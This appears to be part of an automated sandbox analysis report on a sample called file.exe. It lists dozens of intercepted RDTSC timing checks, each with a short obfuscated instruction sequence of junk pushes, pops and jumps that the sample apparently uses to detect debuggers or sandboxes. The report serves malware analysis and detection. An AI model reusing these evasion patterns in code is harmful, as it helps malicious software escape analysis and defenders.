                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5FC1 second address: AE5FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6257 second address: AE6270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA43h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB522 second address: AEB547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6086h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F0E647B6076h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB547 second address: AEB553 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E6551CA36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB3D0 second address: AEB3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB3D6 second address: AEB3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB3DC second address: AEB3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECAC2 second address: AECAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECAC8 second address: AECADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E647B6080h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECADD second address: AECAE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECAE3 second address: AECAFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6083h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFDF7 second address: AEFDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFDFD second address: AEFE07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E647B6076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF94F second address: AEF992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA40h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F0E6551CA40h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F0E6551CA49h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFAF7 second address: AEFAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFAFD second address: AEFB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFB0FA second address: AFB0FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B01756 second address: B0175A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0175A second address: B0175E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0175E second address: B0176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0E6551CA3Eh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06CC1 second address: B06CE6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E647B6076h 0x00000008 jmp 00007F0E647B6085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06CE6 second address: B06CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06CEA second address: B06CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0E647B6076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08D95 second address: B08D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08D9B second address: B08D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08D9F second address: B08DAB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08DAB second address: B08DCF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F0E647B6084h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08DCF second address: B08DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F0E6551CA3Ch 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B08F second address: B0B0B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B6088h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11044 second address: B1104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1104C second address: B1106F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E647B6076h 0x00000008 jo 00007F0E647B6076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jne 00007F0E647B607Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14A44 second address: B14A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B96A second address: B1B982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6084h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B982 second address: B1B98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B98B second address: B1B991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B991 second address: B1B997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A157 second address: B1A17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6081h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F0E647B607Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A2DB second address: B1A2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A2E4 second address: B1A2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A2E8 second address: B1A2EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A2EC second address: B1A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F0E647B6076h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A448 second address: B1A46D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E6551CA36h 0x00000008 jmp 00007F0E6551CA3Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0E6551CA3Ch 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A764 second address: B1A799 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E647B608Dh 0x00000008 jmp 00007F0E647B6085h 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F0E647B607Ah 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F0E647B607Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A799 second address: B1A79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AA56 second address: B1AA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AA5A second address: B1AA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AA5E second address: B1AA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F0E647B6076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AA6F second address: B1AA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AC06 second address: B1AC17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0E647B6076h 0x00000009 jc 00007F0E647B6076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29DA8 second address: B29DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31568 second address: B3157F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E647B607Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3157F second address: B3159A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F0E6551CA3Ch 0x0000000c js 00007F0E6551CA42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3159A second address: B315A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41F55 second address: B41F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58F75 second address: B58F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0E647B6076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58F80 second address: B58FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F0E6551CA36h 0x0000000c popad 0x0000000d jc 00007F0E6551CA3Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jbe 00007F0E6551CA36h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jo 00007F0E6551CA51h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E6551CA3Dh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58FB4 second address: B58FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B08 second address: B59B29 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E6551CA36h 0x00000008 jmp 00007F0E6551CA47h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B29 second address: B59B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F0E647B6076h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 jmp 00007F0E647B6081h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B51 second address: B59B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F475 second address: B5F479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F545 second address: B5F54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FA82 second address: B5FA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FA86 second address: B5FA95 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FA95 second address: B5FAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sbb dx, 81BBh 0x0000000c push dword ptr [ebp+122D20A7h] 0x00000012 mov dword ptr [ebp+122D1CBFh], edi 0x00000018 push E38F8C95h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FAB7 second address: B5FABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B611B2 second address: B611C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007F0E647B6076h 0x0000000d pop ecx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B611C0 second address: B61205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0E6551CA36h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 js 00007F0E6551CA36h 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e jng 00007F0E6551CA6Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0E6551CA49h 0x0000002b js 00007F0E6551CA36h 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0F4E second address: 50D0F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0E88 second address: 50C0EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0E6551CA46h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0E6551CA47h 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A1B second address: 5100A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A34 second address: 5100A74 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0E6551CA42h 0x0000000c jmp 00007F0E6551CA45h 0x00000011 popfd 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E6551CA3Dh 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A74 second address: 5100A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A84 second address: 5100ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0E6551CA3Bh 0x00000016 or eax, 3828FA9Eh 0x0000001c jmp 00007F0E6551CA49h 0x00000021 popfd 0x00000022 mov ecx, 0D22DE67h 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A015F second address: 50A0181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E647B6084h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0181 second address: 50A0193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Eh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0193 second address: 50A0197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0197 second address: 50A01EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edx 0x0000000c mov cx, B36Fh 0x00000010 pop eax 0x00000011 mov bx, 9068h 0x00000015 popad 0x00000016 push dword ptr [ebp+04h] 0x00000019 jmp 00007F0E6551CA47h 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 jmp 00007F0E6551CA46h 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bl, A4h 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A01EB second address: 50A01F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0C03 second address: 50C0C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 4D11B64Eh 0x00000013 mov dx, E95Ah 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C07C1 second address: 50C07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C07D1 second address: 50C07D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C063B second address: 50C063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C063F second address: 50C0643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0643 second address: 50C0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0649 second address: 50C065E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA41h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C065E second address: 50C06DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f call 00007F0E647B6088h 0x00000014 pushfd 0x00000015 jmp 00007F0E647B6082h 0x0000001a adc esi, 24C63AE8h 0x00000020 jmp 00007F0E647B607Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F0E647B607Eh 0x00000032 or cx, 4D48h 0x00000037 jmp 00007F0E647B607Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C06DD second address: 50C06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, AEh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C06E4 second address: 50C0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0E647B607Ch 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F0E647B6089h 0x0000001a sub cx, 3BC6h 0x0000001f jmp 00007F0E647B6081h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0731 second address: 50C074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, dx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C03D1 second address: 50C03D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C03D7 second address: 50C03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
